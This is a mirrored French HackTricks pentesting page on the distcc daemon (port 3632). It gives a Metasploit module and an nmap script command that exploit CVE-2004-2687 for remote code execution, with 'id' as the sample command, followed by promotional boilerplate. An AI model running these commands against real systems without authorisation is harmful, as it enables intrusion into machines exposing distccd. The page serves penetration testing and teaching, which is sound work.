Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00

Translator 55ad4ac82b Translated ['network-services-pentesting/10000-network-data-management-p

2024-01-05 23:03:58 +00:00

3.3 KiB

Raw Blame History

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
Obtenez le merchandising officiel PEASS & HackTricks
Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.

Informations de base

Distcc est conçu pour accélérer la compilation en tirant parti de la puissance de traitement inutilisée sur d'autres ordinateurs. Une machine avec distcc installé peut envoyer du code à compiler à travers le réseau vers un ordinateur qui a le démon distccd et un compilateur compatible installé.

Port par défaut : 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Vérifiez s'il est vulnérable à CVE-2004-2687 pour exécuter du code arbitraire :

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Je ne pense pas que shodan détecte ce service.

Ressources

Post créé par Álex B (@r1p)